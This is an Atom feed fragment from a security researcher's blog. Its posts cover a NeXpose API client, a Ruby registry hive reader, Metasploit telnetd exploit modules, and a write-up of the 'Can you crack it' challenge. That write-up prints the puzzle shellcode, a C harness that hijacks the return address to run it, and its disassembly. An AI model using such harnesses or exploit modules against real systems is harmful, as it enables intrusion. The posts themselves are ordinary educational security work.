Here are the results: &lt;a href="http://browsershots.org/http://volatileminds.net/import_test.html"&gt;http://browsershots.org/http://volatileminds.net/import_test.html&lt;/a&gt; &lt;br /&gt;
&lt;br /&gt;
Black means it supports it. White means it doesn't.&lt;img src="http://feeds.feedburner.com/~r/VolatileMinds/~4/LeBTI0gn6to" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://volatile-minds.blogspot.com/feeds/969003547412524057/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://volatile-minds.blogspot.com/2012/02/what-browsers-support-import-in-their.html#comment-form" title="2 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/7234216734688094130/posts/default/969003547412524057?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/7234216734688094130/posts/default/969003547412524057?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/VolatileMinds/~3/LeBTI0gn6to/what-browsers-support-import-in-their.html" title="What browsers support @import in their CSS?" /><author><name>Brandon Perry</name><uri>http://www.blogger.com/profile/04227634714412263524</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="24" src="http://1.bp.blogspot.com/-FJO21-rztvs/TqspC1JU_tI/AAAAAAAAAME/olpwtY2amXc/s220/2011-10-28-171152.jpg" /></author><thr:total>2</thr:total><feedburner:origLink>http://volatile-minds.blogspot.com/2012/02/what-browsers-support-import-in-their.html</feedburner:origLink></entry><entry gd:etag="W/&quot;CkYBQ306eyp7ImA9WhRVE08.&quot;"><id>tag:blogger.com,1999:blog-7234216734688094130.post-6360564069779055544</id><published>2012-01-11T16:09:00.001-06:00</published><updated>2012-01-11T16:15:52.313-06:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2012-01-11T16:15:52.313-06:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="nexpose" /><category scheme="http://www.blogger.com/atom/ns#" term="ubuntu-only" /><category scheme="http://www.blogger.com/atom/ns#" term="C#" 
/><title>Communicating with your NeXpose server via Mono/.NET</title><content type="html">I have a &lt;a href="https://github.com/brandonprry/nexpose-sharp"&gt;public repo&lt;/a&gt; on github that houses my nexpose-sharp library. It is written in C# and consumes the NeXpose XML API (both 1.1 and 1.2). Here is an example of how easy it is to get all the vuln checks NeXpose has:&lt;br /&gt;
&lt;pre&gt;
using System;
using System.Xml;
using nexposesharp;

namespace nexposeclient
{
    class MainClass
    {
        public static void Main (string[] args)
        {
            // Open a session to the NeXpose console and log in
            using (NexposeSession session = new NexposeSession("192.168.56.101"))
            {
                session.Authenticate("nexpose"/*user*/, "nexpose"/*password*/);

                // The 1.1 manager wraps the XML API v1.1 calls
                using (NexposeManager11 manager = new NexposeManager11(session))
                {
                    XmlDocument vulns = manager.GetVulnerabilityListing();

                    int i = 0;
                    foreach (XmlNode vuln in vulns.FirstChild.ChildNodes)
                    {
                        string vulnID = vuln.Attributes["id"].Value;

                        // One round trip per vulnerability to fetch its details
                        XmlDocument deets = manager.GetVulnerabilityDetails(vulnID);

                        string title = deets.FirstChild.FirstChild.Attributes["title"].Value;
                        string severity = deets.FirstChild.FirstChild.Attributes["severity"].Value;

                        Console.WriteLine(String.Format("{0} has a severity of {1} and an id of {2}", title, severity, vulnID));

                        i++;
                    }

                    Console.WriteLine("\n\nTotal vulnerabilities in database: " + i);
                }
            }
        }
    }
}
&lt;/pre&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-cqDQ99t01t0/Tw4KAoRsiVI/AAAAAAAAAM8/1t8IS3nc3Jg/s1600/Screenshot%2Bat%2B2012-01-11%2B16%253A15%253A18.png" imageanchor="1" style="margin-left:1em; margin-right:1em"&gt;&lt;img border="0" height="265" width="400" src="http://3.bp.blogspot.com/-cqDQ99t01t0/Tw4KAoRsiVI/AAAAAAAAAM8/1t8IS3nc3Jg/s400/Screenshot%2Bat%2B2012-01-11%2B16%253A15%253A18.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
The library has two manager implementations. The above example uses &lt;a href="http://download2.rapid7.com/download/NeXpose-v4/NeXpose_API_v1.1_Guide.pdf"&gt;the 1.1 API&lt;/a&gt;. A NexposeManager12 class exists that inherits from NexposeManager11 (available from NeXpose 4.0) and implements the &lt;a href="http://download2.rapid7.com/download/NeXpose-v4/NeXpose_Extended_API_v1.2_Guide.pdf"&gt;extended 1.2 API&lt;/a&gt; (available for NeXpose installations of 4.8+). I am currently in the process of writing some unit tests, which will be committed as soon as possible.&lt;br /&gt;
&lt;br /&gt;
You can grab a copy of &lt;a href="http://www.rapid7.com/products/nexpose-community-edition.jsp"&gt;NeXpose Community Edition&lt;/a&gt; today and try it out!&lt;img src="http://feeds.feedburner.com/~r/VolatileMinds/~4/9qH7LdF04pk" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://volatile-minds.blogspot.com/feeds/6360564069779055544/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://volatile-minds.blogspot.com/2012/01/communicating-with-your-nexpose-server.html#comment-form" title="1 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/7234216734688094130/posts/default/6360564069779055544?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/7234216734688094130/posts/default/6360564069779055544?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/VolatileMinds/~3/9qH7LdF04pk/communicating-with-your-nexpose-server.html" title="Communicating with your NeXpose server via Mono/.NET" /><author><name>Brandon Perry</name><uri>http://www.blogger.com/profile/04227634714412263524</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="24" src="http://1.bp.blogspot.com/-FJO21-rztvs/TqspC1JU_tI/AAAAAAAAAME/olpwtY2amXc/s220/2011-10-28-171152.jpg" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://3.bp.blogspot.com/-cqDQ99t01t0/Tw4KAoRsiVI/AAAAAAAAAM8/1t8IS3nc3Jg/s72-c/Screenshot%2Bat%2B2012-01-11%2B16%253A15%253A18.png" height="72" width="72" /><thr:total>1</thr:total><feedburner:origLink>http://volatile-minds.blogspot.com/2012/01/communicating-with-your-nexpose-server.html</feedburner:origLink></entry><entry 
gd:etag="W/&quot;DkENQXs7eSp7ImA9WhRWGEo.&quot;"><id>tag:blogger.com,1999:blog-7234216734688094130.post-5589232261428462703</id><published>2012-01-06T12:31:00.000-06:00</published><updated>2012-01-06T12:31:30.501-06:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2012-01-06T12:31:30.501-06:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="ruby" /><category scheme="http://www.blogger.com/atom/ns#" term="registry" /><category scheme="http://www.blogger.com/atom/ns#" term="ubuntu-only" /><title>Reading offline registry hives in pure ruby</title><content type="html">If you have ever wanted to peruse a registry hive on Linux, you know that the options are really lacking. Most people wonder why you would even want to read a registry hive on Linux, but it is fairly straightforward when you think of the kind of people who will be traversing registry hives in the first place: forensic analysts and reverse engineers, who will often run Linux.&lt;br /&gt;
&lt;br /&gt;
Last night, I checked in my offline registry hive library written in Ruby. I had written a really crappy one in C# based on key signatures, rather than parsing the actual tree. This library does it correctly, by parsing the key tree. It is still in its infancy, but it works well enough. You may view the code &lt;a href="https://github.com/brandonprry/ntreg-ruby/"&gt;here&lt;/a&gt;. One day, I hope this gets merged into the Metasploit trunk in some form or fashion. Tested on Ubuntu 11.10 on ruby 1.9.2p290 (2011-07-09 revision 32553) [x86_64-linux].&lt;br /&gt;
&lt;br /&gt;
&lt;pre&gt;root@w00den-pickle:/home/bperry/tmo/hives/ntreg-ruby# ruby ntreg.rb '\Select' ../SYSTEM
Hive name: "SYSTEM"
Found root key: CMI-CreateHive{F10156BE-0E87-4EFB-969E-5DA29D131144}
The values and data of \CMI-CreateHive{F10156BE-0E87-4EFB-969E-5DA29D131144}\Select are:
"Current: \x01\x00\x00\x00"
"Default: \x01\x00\x00\x00"
"Failed: \x00\x00\x00\x00"
"LastKnownGood: \x02\x00\x00\x00"
root@w00den-pickle:/home/bperry/tmo/hives/ntreg-ruby# ruby ntreg.rb '\ControlSet001\Control\Lsa' ../SYSTEM
Hive name: "SYSTEM"
Found root key: CMI-CreateHive{F10156BE-0E87-4EFB-969E-5DA29D131144}
The children of \CMI-CreateHive{F10156BE-0E87-4EFB-969E-5DA29D131144}\ControlSet001\Control\Lsa are:
"AccessProviders"
"Audit"
"Credssp"
"Data"
"FipsAlgorithmPolicy"
"GBG"
"JD"
"Kerberos"
"MSV1_0"
"Skew1"
"SSO"
"SspiCache"
The values and data of \CMI-CreateHive{F10156BE-0E87-4EFB-969E-5DA29D131144}\ControlSet001\Control\Lsa are:
"auditbaseobjects: \x00\x00\x00\x00"
"auditbasedirectories: \x00\x00\x00\x00"
"crashonauditfail: \x00\x00\x00\x00"
"fullprivilegeauditing: \x00\x00\x00\x00"
"Bounds: \x000\x00\x00\x00 \x00\x00"
"LimitBlankPasswordUse: \x01\x00\x00\x00"
"NoLmHash: \x01\x00\x00\x00"
"Notification Packages: s\x00c\x00e\x00c\x00l\x00i\x00\x00\x00\x00\x00"
"Security Packages: k\x00e\x00r\x00b\x00e\x00r\x00o\x00s\x00\x00\x00m\x00s\x00v\x001\x00_\x000\x00\x00\x00s\x00c\x00h\x00a\x00n\x00n\x00e\x00l\x00\x00\x00w\x00d\x00i\x00g\x00e\x00s\x00t\x00\x00\x00t\x00s\x00p\x00k\x00g\x00\x00\x00p\x00k\x00u\x002\x00u\x00\x00\x00\x00\x00"
"Authentication Packages: m\x00s\x00v\x001\x00_\x000\x00\x00\x00\x00\x00"
"LsaPid: \xEC\x01\x00\x00"
"SecureBoot: \x01\x00\x00\x00"
"ProductType: \x02\x00\x00\x00"
"disabledomaincreds: \x00\x00\x00\x00"
"everyoneincludesanonymous: \x00\x00\x00\x00"
"forceguest: \x00\x00\x00\x00"
"restrictanonymous: \x00\x00\x00\x00"
"restrictanonymoussam: \x01\x00\x00\x00"
root@w00den-pickle:/home/bperry/tmo/hives/ntreg-ruby#
&lt;/pre&gt;&lt;img src="http://feeds.feedburner.com/~r/VolatileMinds/~4/AcKcmgT3KXc" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://volatile-minds.blogspot.com/feeds/5589232261428462703/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://volatile-minds.blogspot.com/2012/01/reading-offline-registry-hives-in-pure.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/7234216734688094130/posts/default/5589232261428462703?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/7234216734688094130/posts/default/5589232261428462703?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/VolatileMinds/~3/AcKcmgT3KXc/reading-offline-registry-hives-in-pure.html" title="Reading offline registry hives in pure ruby" /><author><name>Brandon Perry</name><uri>http://www.blogger.com/profile/04227634714412263524</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="24" src="http://1.bp.blogspot.com/-FJO21-rztvs/TqspC1JU_tI/AAAAAAAAAME/olpwtY2amXc/s220/2011-10-28-171152.jpg" /></author><thr:total>0</thr:total><feedburner:origLink>http://volatile-minds.blogspot.com/2012/01/reading-offline-registry-hives-in-pure.html</feedburner:origLink></entry><entry gd:etag="W/&quot;CEcBSH4_cCp7ImA9WhRWEUw.&quot;"><id>tag:blogger.com,1999:blog-7234216734688094130.post-2527470911919088967</id><published>2011-12-28T16:40:00.000-06:00</published><updated>2011-12-28T16:40:59.048-06:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-12-28T16:40:59.048-06:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="ubuntu-only" /><category scheme="http://www.blogger.com/atom/ns#" term="security" /><category scheme="http://www.blogger.com/atom/ns#" term="metasploit" /><title>New metasploit modules in 
trunk</title><content type="html">Last night HDM checked in a telnetd remote root &lt;a href="https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/telnet/telnet_encrypt_overflow.rb"&gt;scanner&lt;/a&gt; and &lt;a href="https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/freebsd/telnet/telnet_encrypt_keyid.rb"&gt;exploit&lt;/a&gt; module for BSD-derived telnetd servers (this vuln affects telnet &lt;i&gt;clients&lt;/i&gt; as well). We were up late last night working on it. Any testing is appreciated.&lt;br /&gt;
&lt;br /&gt;
Today, sinn3r checked my &lt;a href="https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/corpwatch_lookup_id.rb"&gt;CorpWatch&lt;/a&gt; &lt;a href="https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/corpwatch_lookup_name.rb"&gt;API&lt;/a&gt; modules into trunk. These aid in OSINT research  for a company during an engagement.&lt;img src="http://feeds.feedburner.com/~r/VolatileMinds/~4/TDOSp2XVdcs" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://volatile-minds.blogspot.com/feeds/2527470911919088967/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://volatile-minds.blogspot.com/2011/12/new-metasploit-modules-in-trunk.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/7234216734688094130/posts/default/2527470911919088967?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/7234216734688094130/posts/default/2527470911919088967?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/VolatileMinds/~3/TDOSp2XVdcs/new-metasploit-modules-in-trunk.html" title="New metasploit modules in trunk" /><author><name>Brandon Perry</name><uri>http://www.blogger.com/profile/04227634714412263524</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="24" src="http://1.bp.blogspot.com/-FJO21-rztvs/TqspC1JU_tI/AAAAAAAAAME/olpwtY2amXc/s220/2011-10-28-171152.jpg" /></author><thr:total>0</thr:total><feedburner:origLink>http://volatile-minds.blogspot.com/2011/12/new-metasploit-modules-in-trunk.html</feedburner:origLink></entry><entry 
gd:etag="W/&quot;C0YNSH8zfip7ImA9WhRQGE4.&quot;"><id>tag:blogger.com,1999:blog-7234216734688094130.post-9031888984203862085</id><published>2011-12-13T20:53:00.000-06:00</published><updated>2011-12-13T20:53:19.186-06:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-12-13T20:53:19.186-06:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="ubuntu-only" /><category scheme="http://www.blogger.com/atom/ns#" term="metasploit" /><title>Finding all exploits with RPORT == X</title><content type="html">This question comes up quite a bit in the IRC channel: how can I see all exploits for a given port? You can do it easily with IRB:&lt;br /&gt;
&lt;br /&gt;
&lt;pre&gt;msf &gt; irb
&gt;&gt; framework.exploits.each_module { |n,e| x=e.new; print_good("#{e.fullname}: #{x.datastore['RPORT']}") if x.datastore['RPORT'].to_i == 445   }; nil
&lt;/pre&gt;&lt;br /&gt;
Just replace 445 with the port you are looking for. If you want aux modules, you may replace framework.exploits with framework.auxiliary.&lt;img src="http://feeds.feedburner.com/~r/VolatileMinds/~4/s35yvFiT_e4" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://volatile-minds.blogspot.com/feeds/9031888984203862085/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://volatile-minds.blogspot.com/2011/12/finding-all-exploits-with-rport-x.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/7234216734688094130/posts/default/9031888984203862085?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/7234216734688094130/posts/default/9031888984203862085?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/VolatileMinds/~3/s35yvFiT_e4/finding-all-exploits-with-rport-x.html" title="Finding all exploits with RPORT == X" /><author><name>Brandon Perry</name><uri>http://www.blogger.com/profile/04227634714412263524</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="24" src="http://1.bp.blogspot.com/-FJO21-rztvs/TqspC1JU_tI/AAAAAAAAAME/olpwtY2amXc/s220/2011-10-28-171152.jpg" /></author><thr:total>0</thr:total><feedburner:origLink>http://volatile-minds.blogspot.com/2011/12/finding-all-exploits-with-rport-x.html</feedburner:origLink></entry><entry gd:etag="W/&quot;DU4ER3g9eCp7ImA9WhRRF0w.&quot;"><id>tag:blogger.com,1999:blog-7234216734688094130.post-3046172381370545977</id><published>2011-11-30T23:38:00.000-06:00</published><updated>2011-11-30T23:38:26.660-06:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-11-30T23:38:26.660-06:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="reverse engineering" /><category scheme="http://www.blogger.com/atom/ns#" 
term="ubuntu-only" /><title>Can you crack it? (nope, I tried though)</title><content type="html">The UK govt created a challenge to find eligible code crackers. The website is &lt;a href="http://www.canyoucrackit.co.uk/"&gt;http://www.canyoucrackit.co.uk/&lt;/a&gt;.&lt;br /&gt;
&lt;br /&gt;
I got close, but my skills aren't up to par. Here is as far as I got. They give you the following code:&lt;br /&gt;
&lt;br /&gt;
&lt;pre&gt;eb 04 af c2 bf a3 81 ec  00 01 00 00 31 c9 88 0c
0c fe c1 75 f9 31 c0 ba  ef be ad de 02 04 0c 00
d0 c1 ca 08 8a 1c 0c 8a  3c 04 88 1c 04 88 3c 0c
fe c1 75 e8 e9 5c 00 00  00 89 e3 81 c3 04 00 00
00 5c 58 3d 41 41 41 41  75 43 48 3d 42 42 42 42
75 3b 5a 89 d1 89 e6 89  df 29 cf f3 a4 89 de 89
d1 89 df 29 cf 31 c0 31  db 31 d2 fe c0 02 1c 06
8a 14 06 8a 34 1e 88 34  06 88 14 1e 00 f2 30 f6
8a 1c 16 8a 17 30 da 88  17 47 49 75 de 31 db 89
d8 fe c0 cd 80 90 90 e8  9d ff ff ff 41 41 41 41
&lt;/pre&gt;&lt;br /&gt;
What jumps out at me first are the nops (90 90) in the last line. My mind automagically tells me this is shellcode. I wasn't 100% sure, but it was the only guess I had. I copied the code over into gedit, and made the following adjustments.&lt;br /&gt;
&lt;br /&gt;
&lt;pre&gt;\xeb\x04\xaf\xc2\xbf\xa3\x81\xec\x00\x01\x00\x00\x31\xc9\x88\x0c
\x0c\xfe\xc1\x75\xf9\x31\xc0\xba\xef\xbe\xad\xde\x02\x04\x0c\x00
\xd0\xc1\xca\x08\x8a\x1c\x0c\x8a\x3c\x04\x88\x1c\x04\x88\x3c\x0c
\xfe\xc1\x75\xe8\xe9\x5c\x00\x00\x00\x89\xe3\x81\xc3\x04\x00\x00
\x00\x5c\x58\x3d\x41\x41\x41\x41\x75\x43\x48\x3d\x42\x42\x42\x42
\x75\x3b\x5a\x89\xd1\x89\xe6\x89\xdf\x29\xcf\xf3\xa4\x89\xde\x89
\xd1\x89\xdf\x29\xcf\x31\xc0\x31\xdb\x31\xd2\xfe\xc0\x02\x1c\x06
\x8a\x14\x06\x8a\x34\x1e\x88\x34\x06\x88\x14\x1e\x00\xf2\x30\xf6
\x8a\x1c\x16\x8a\x17\x30\xda\x88\x17\x47\x49\x75\xde\x31\xdb\x89
\xd8\xfe\xc0\xcd\x80\x90\x90\xe8\x9d\xff\xff\xff\x41\x41\x41\x41
&lt;/pre&gt;&lt;br /&gt;
I then saved this into a shellcode.c file:&lt;br /&gt;
&lt;br /&gt;
&lt;pre&gt;
char shellcode[] = "\xeb\x04\xaf\xc2\xbf\xa3\x81\xec\x00\x01\x00\x00\x31\xc9\x88\x0c\x0c\xfe\xc1\x75\xf9\x31\xc0\xba\xef\xbe\xad\xde\x02\x04\x0c\x00\xd0\xc1\xca\x08\x8a\x1c\x0c\x8a\x3c\x04\x88\x1c\x04\x88\x3c\x0c\xfe\xc1\x75\xe8\xe9\x5c\x00\x00\x00\x89\xe3\x81\xc3\x04\x00\x00\x00\x5c\x58\x3d\x41\x41\x41\x41\x75\x43\x48\x3d\x42\x42\x42\x42\x75\x3b\x5a\x89\xd1\x89\xe6\x89\xdf\x29\xcf\xf3\xa4\x89\xde\x89\xd1\x89\xdf\x29\xcf\x31\xc0\x31\xdb\x31\xd2\xfe\xc0\x02\x1c\x06\x8a\x14\x06\x8a\x34\x1e\x88\x34\x06\x88\x14\x1e\x00\xf2\x30\xf6\x8a\x1c\x16\x8a\x17\x30\xda\x88\x17\x47\x49\x75\xde\x31\xdb\x89\xd8\xfe\xc0\xcd\x80\x90\x90\xe8\x9d\xff\xff\xff\x41\x41\x41\x41";

#include &lt;stdio.h&gt;

int main(void) {
   int *ret;

   /* Classic shellcode test harness: point two words past the local
      variable (where the saved return address is assumed to sit) and
      overwrite it with the address of the shellcode buffer. Note that
      casting a pointer to int truncates it on a 64-bit build. */
   ret = (int *)&amp;ret + 2;
   (*ret) = (int)shellcode;

   printf("done");
   return 0;
}
&lt;/pre&gt;&lt;br /&gt;
Running it simply printed the "done" from printf. This told me that the shellcode was at least not crashing, so it was probably valid shellcode. Looks like my first impression was correct. So I jumped to the disassembly of the shellcode to get a better understanding of it:&lt;br /&gt;
&lt;br /&gt;
&lt;pre&gt;0000000000601040 &lt;shellcode&gt;:
  601040: eb 04                 jmp    601046 &lt;shellcode+0x6&gt;
  601042: af                    scas   %es:(%rdi),%eax
  601043: c2 bf a3              retq   $0xa3bf
  601046: 81 ec 00 01 00 00     sub    $0x100,%esp
  60104c: 31 c9                 xor    %ecx,%ecx
  60104e: 88 0c 0c              mov    %cl,(%rsp,%rcx,1)
  601051: fe c1                 inc    %cl
  601053: 75 f9                 jne    60104e &lt;shellcode+0xe&gt;
  601055: 31 c0                 xor    %eax,%eax
  601057: ba ef be ad de        mov    $0xdeadbeef,%edx
  60105c: 02 04 0c              add    (%rsp,%rcx,1),%al
  60105f: 00 d0                 add    %dl,%al
  601061: c1 ca 08              ror    $0x8,%edx
  601064: 8a 1c 0c              mov    (%rsp,%rcx,1),%bl
  601067: 8a 3c 04              mov    (%rsp,%rax,1),%bh
  60106a: 88 1c 04              mov    %bl,(%rsp,%rax,1)
  60106d: 88 3c 0c              mov    %bh,(%rsp,%rcx,1)
  601070: fe c1                 inc    %cl
  601072: 75 e8                 jne    60105c &lt;shellcode+0x1c&gt;
  601074: e9 5c 00 00 00        jmpq   6010d5 &lt;shellcode+0x95&gt;
  601079: 89 e3                 mov    %esp,%ebx
  60107b: 81 c3 04 00 00 00     add    $0x4,%ebx
  601081: 5c                    pop    %rsp
  601082: 58                    pop    %rax
  601083: 3d 41 41 41 41        cmp    $0x41414141,%eax
  601088: 75 43                 jne    6010cd &lt;shellcode+0x8d&gt;
  60108a: 48 3d 42 42 42 42     cmp    $0x42424242,%rax
  601090: 75 3b                 jne    6010cd &lt;shellcode+0x8d&gt;
  601092: 5a                    pop    %rdx
  601093: 89 d1                 mov    %edx,%ecx
  601095: 89 e6                 mov    %esp,%esi
  601097: 89 df                 mov    %ebx,%edi
  601099: 29 cf                 sub    %ecx,%edi
  60109b: f3 a4                 rep movsb %ds:(%rsi),%es:(%rdi)
  60109d: 89 de                 mov    %ebx,%esi
  60109f: 89 d1                 mov    %edx,%ecx
  6010a1: 89 df                 mov    %ebx,%edi
  6010a3: 29 cf                 sub    %ecx,%edi
  6010a5: 31 c0                 xor    %eax,%eax
  6010a7: 31 db                 xor    %ebx,%ebx
  6010a9: 31 d2                 xor    %edx,%edx
  6010ab: fe c0                 inc    %al
  6010ad: 02 1c 06              add    (%rsi,%rax,1),%bl
  6010b0: 8a 14 06              mov    (%rsi,%rax,1),%dl
  6010b3: 8a 34 1e              mov    (%rsi,%rbx,1),%dh
  6010b6: 88 34 06              mov    %dh,(%rsi,%rax,1)
  6010b9: 88 14 1e              mov    %dl,(%rsi,%rbx,1)
  6010bc: 00 f2                 add    %dh,%dl
  6010be: 30 f6                 xor    %dh,%dh
  6010c0: 8a 1c 16              mov    (%rsi,%rdx,1),%bl
  6010c3: 8a 17                 mov    (%rdi),%dl
  6010c5: 30 da                 xor    %bl,%dl
  6010c7: 88 17                 mov    %dl,(%rdi)
  6010c9: 47                    rex.RXB
  6010ca: 49 75 de              rex.WB jne    6010ab &lt;shellcode+0x6b&gt;
  6010cd: 31 db                 xor    %ebx,%ebx
  6010cf: 89 d8                 mov    %ebx,%eax
  6010d1: fe c0                 inc    %al
  6010d3: cd 80                 int    $0x80
  6010d5: 90                    nop
  6010d6: 90                    nop
  6010d7: e8 9d ff ff ff        callq  601079 &lt;shellcode+0x39&gt;
  6010dc: 41                    rex.B
  6010dd: 41                    rex.B
  6010de: 41                    rex.B
  6010df: 41 00 00              add    %al,(%r8)
&lt;/pre&gt;&lt;br /&gt;
Definitely legitimate shellcode. The x86 asm gcc spits out is exactly what I wanted to see. Not only that, but do you see the 0xdeadbeef?&lt;br /&gt;
&lt;br /&gt;
Once I knew I was headed in the right direction, I loaded the binary into gdb. I threw a breakpoint on the printf line with &lt;code&gt;break printf&lt;/code&gt; and ran the binary. I looked at the stack frame, traversed through the memory and found the strings I suspected were what we were supposed to be looking for. However, they seemed to be all multi-byte characters. I wasn't able to decipher any of them within the time limit. I had found out about the contest about 2 hours before it was over. This took me about an hour to get to traversing the stack for the strings, and I got stuck.&lt;br /&gt;
&lt;br /&gt;
Oh well. Maybe next time if I have more time I can get a bit further.&lt;img src="http://feeds.feedburner.com/~r/VolatileMinds/~4/PWKkUZqIPXE" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://volatile-minds.blogspot.com/feeds/3046172381370545977/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://volatile-minds.blogspot.com/2011/11/can-you-crack-it-nope-i-tried-though.html#comment-form" title="402 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/7234216734688094130/posts/default/3046172381370545977?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/7234216734688094130/posts/default/3046172381370545977?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/VolatileMinds/~3/PWKkUZqIPXE/can-you-crack-it-nope-i-tried-though.html" title="Can you crack it? (nope, I tried though)" /><author><name>Brandon Perry</name><uri>http://www.blogger.com/profile/04227634714412263524</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="24" src="http://1.bp.blogspot.com/-FJO21-rztvs/TqspC1JU_tI/AAAAAAAAAME/olpwtY2amXc/s220/2011-10-28-171152.jpg" /></author><thr:total>402</thr:total><feedburner:origLink>http://volatile-minds.blogspot.com/2011/11/can-you-crack-it-nope-i-tried-though.html</feedburner:origLink></entry><entry gd:etag="W/&quot;CU4HQX4yeCp7ImA9WhRRE04.&quot;"><id>tag:blogger.com,1999:blog-7234216734688094130.post-1611201547718820315</id><published>2011-11-26T12:58:00.001-06:00</published><updated>2011-11-26T12:58:50.090-06:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-11-26T12:58:50.090-06:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="linux" /><category scheme="http://www.blogger.com/atom/ns#" term="ubuntu-only" /><category scheme="http://www.blogger.com/atom/ns#" 
term="neat" /><title>Easily splitting and storing traceroute data</title><content type="html">Traceroute is very useful, but the data it spits out can be a bit tough to chew on. I came up with this one-liner to make it more CSV-compatible, so you can Split() on commas and have the correct data where you expect it.&lt;br /&gt;
&lt;pre&gt;traceroute google.com | sed 's/  /,/g' | sed 's/ ms / ms,/g'
&lt;/pre&gt;This takes load balancers into account as well, so when your route changes slightly during a hop, you can still easily grok the data coming back. Basically, double spaces are replaced with a comma. The second sed is what takes the load balancers into account, fixing the output so it matches the format of the prior hop test.&lt;img src="http://feeds.feedburner.com/~r/VolatileMinds/~4/lcSki6YucnY" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://volatile-minds.blogspot.com/feeds/1611201547718820315/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://volatile-minds.blogspot.com/2011/11/easily-splitting-and-storing-traceroute.html#comment-form" title="2 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/7234216734688094130/posts/default/1611201547718820315?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/7234216734688094130/posts/default/1611201547718820315?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/VolatileMinds/~3/lcSki6YucnY/easily-splitting-and-storing-traceroute.html" title="Easily splitting and storing traceroute data" /><author><name>Brandon Perry</name><uri>http://www.blogger.com/profile/04227634714412263524</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="24" src="http://1.bp.blogspot.com/-FJO21-rztvs/TqspC1JU_tI/AAAAAAAAAME/olpwtY2amXc/s220/2011-10-28-171152.jpg" /></author><thr:total>2</thr:total><feedburner:origLink>http://volatile-minds.blogspot.com/2011/11/easily-splitting-and-storing-traceroute.html</feedburner:origLink></entry></feed>
